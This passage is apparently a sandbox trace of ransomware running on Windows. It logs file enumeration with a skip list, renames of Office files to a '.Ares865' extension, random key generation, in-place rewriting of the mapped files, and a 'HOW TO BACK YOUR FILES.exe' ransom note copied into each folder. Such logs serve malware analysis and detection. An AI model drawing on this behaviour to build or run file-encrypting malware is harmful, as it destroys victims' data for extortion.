hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0066.835] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.835] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0066.835] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.835] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0066.836] CloseHandle (hObject=0x120) returned 1 [0066.836] CloseHandle (hObject=0x12c) returned 1 [0066.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.837] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1db63000, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd6f62f60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1db63000, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x9fb78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WORKFLOW.DLL", cAlternateFileName="")) returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="aoldtz.exe") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2=".") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="..") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="windows") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="bootmgr") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="temp") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="pagefile.sys") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="boot") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="ids.txt") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="ntuser.dat") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="perflogs") returned 1 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2="MSBuild") returned 1 [0066.837] lstrlenW (lpString="WORKFLOW.DLL") returned 12 [0066.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRMV.XML") returned 55 [0066.837] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="WORKFLOW.DLL" | out: lpString1="WORKFLOW.DLL") returned="WORKFLOW.DLL" [0066.837] lstrlenW (lpString="WORKFLOW.DLL") returned 12 [0066.837] lstrlenW (lpString="Ares865") returned 7 [0066.837] lstrcmpiW (lpString1="LOW.DLL", lpString2="Ares865") returned 1 [0066.837] lstrlenW (lpString=".dll") returned 4 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2=".dll") returned 1 [0066.837] lstrlenW (lpString=".lnk") returned 4 [0066.837] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2=".lnk") returned 1 [0066.838] lstrlenW (lpString=".ini") returned 4 [0066.838] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2=".ini") returned 1 [0066.838] lstrlenW (lpString=".sys") returned 4 [0066.838] lstrcmpiW (lpString1="WORKFLOW.DLL", lpString2=".sys") returned 1 [0066.838] lstrlenW (lpString="WORKFLOW.DLL") returned 12 [0066.838] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\XLCPRTID.XML.Ares865") returned 63 [0066.838] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLCPRTID.XML" (normalized: "c:\\program files\\microsoft office\\office14\\xlcprtid.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLCPRTID.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\xlcprtid.xml.ares865"), dwFlags=0x1) returned 1 [0066.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLCPRTID.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\xlcprtid.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0066.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79748) returned 1 [0066.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0066.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0066.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0066.866] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0066.866] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.866] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.867] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a90, lpName=0x0) returned 0x164 [0066.881] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a90) returned 0x190000 [0066.990] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0066.991] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.991] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.020] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.022] CloseHandle (hObject=0x164) returned 1 [0067.022] CloseHandle (hObject=0x118) returned 1 [0067.022] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.022] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.029] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.036] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf73e1e00, ftCreationTime.dwHighDateTime=0x1cacb3c, ftLastAccessTime.dwLowDateTime=0x70c534f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf73e1e00, ftLastWriteTime.dwHighDateTime=0x1cacb3c, nFileSizeHigh=0x0, nFileSizeLow=0x169360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLICONS.EXE", cAlternateFileName="")) returned 1 [0067.037] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.037] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="aoldtz.exe") returned 1 [0067.037] lstrcmpiW (lpString1="XLICONS.EXE", lpString2=".") returned 1 [0067.038] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="..") returned 1 [0067.038] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="windows") returned 1 [0067.038] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="bootmgr") returned 1 [0067.038] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="temp") returned 1 [0067.038] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="pagefile.sys") returned 1 [0067.038] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="boot") returned 1 [0067.038] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="ids.txt") returned 1 [0067.044] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="ntuser.dat") returned 1 [0067.044] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="perflogs") returned 1 [0067.045] lstrcmpiW (lpString1="XLICONS.EXE", lpString2="MSBuild") returned 1 [0067.045] lstrlenW (lpString="XLICONS.EXE") returned 11 [0067.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\XLCPRTID.XML") returned 55 [0067.046] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="XLICONS.EXE" | out: lpString1="XLICONS.EXE") returned="XLICONS.EXE" [0067.046] lstrlenW (lpString="XLICONS.EXE") returned 11 [0067.046] lstrlenW (lpString="Ares865") returned 7 [0067.046] lstrcmpiW (lpString1="ONS.EXE", lpString2="Ares865") returned 1 [0067.046] lstrlenW (lpString=".dll") returned 4 [0067.046] lstrcmpiW (lpString1="XLICONS.EXE", lpString2=".dll") returned 1 [0067.046] lstrlenW (lpString=".lnk") returned 4 [0067.046] lstrcmpiW (lpString1="XLICONS.EXE", lpString2=".lnk") returned 1 [0067.046] lstrlenW (lpString=".ini") returned 4 [0067.046] lstrcmpiW (lpString1="XLICONS.EXE", lpString2=".ini") returned 1 [0067.046] lstrlenW (lpString=".sys") returned 4 [0067.046] lstrcmpiW (lpString1="XLICONS.EXE", lpString2=".sys") returned 1 [0067.055] lstrlenW (lpString="XLICONS.EXE") returned 11 [0067.056] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART") returned="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART" [0067.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4da0 | out: hHeap=0x2b0000) returned 1 [0067.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0067.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART") returned 50 [0067.076] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART") returned="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART" [0067.076] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.076] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\xlstart\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.104] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.104] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x597fad20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x597fad20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.105] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.105] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.105] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.105] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x597fad20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x597fad20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.105] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.105] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.105] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.105] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.105] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x597fad20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x597fad20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.105] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.105] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x597fad20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x597fad20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0067.105] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0067.105] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d25e8 [0067.105] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content") returned="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content" [0067.105] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0067.105] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0067.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content") returned 56 [0067.105] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content") returned="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content" [0067.105] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.105] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.110] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.110] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x59820e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59820e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.110] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.110] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.110] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.110] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x59820e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59820e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.110] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.110] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.110] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.110] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.110] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x52203420, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52203420, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0067.110] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.110] lstrcmpiW (lpString1="1033", lpString2="aoldtz.exe") returned -1 [0067.110] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0067.110] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0067.110] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0067.110] lstrcmpiW (lpString1="1033", lpString2="bootmgr") returned -1 [0067.110] lstrcmpiW (lpString1="1033", lpString2="temp") returned -1 [0067.110] lstrcmpiW (lpString1="1033", lpString2="pagefile.sys") returned -1 [0067.110] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0067.111] lstrcmpiW (lpString1="1033", lpString2="ids.txt") returned -1 [0067.111] lstrcmpiW (lpString1="1033", lpString2="ntuser.dat") returned -1 [0067.111] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0067.111] lstrcmpiW (lpString1="1033", lpString2="MSBuild") returned -1 [0067.111] lstrlenW (lpString="1033") returned 4 [0067.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\*") returned 58 [0067.111] lstrcpyW (in: lpString1=0x2e2e8d2, lpString2="1033" | out: lpString1="1033") returned="1033" [0067.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25e0 [0067.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f0518 [0067.111] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d25e8 | out: ListHead=0x2e77d0, ListEntry=0x2d25e8) returned 0x2d25c8 [0067.111] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59820e80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x59820e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.111] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.111] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59820e80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x59820e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0067.111] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0067.111] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d25e8 [0067.111] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033" [0067.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.111] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0067.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033") returned 61 [0067.111] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033" [0067.111] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.111] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.121] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.121] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x59820e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59820e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0067.122] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.122] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.122] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.122] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x59820e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59820e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.123] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.123] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.123] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.123] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.123] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d6e4b00, ftCreationTime.dwHighDateTime=0x1ca4888, ftLastAccessTime.dwLowDateTime=0x50526960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1d6e4b00, ftLastWriteTime.dwHighDateTime=0x1ca4888, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACTDIR_M.VST", cAlternateFileName="")) returned 1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="aoldtz.exe") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2=".") returned 1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="..") returned 1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="windows") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="bootmgr") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="temp") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="pagefile.sys") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="boot") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="ids.txt") returned -1 [0067.123] lstrcmpiW 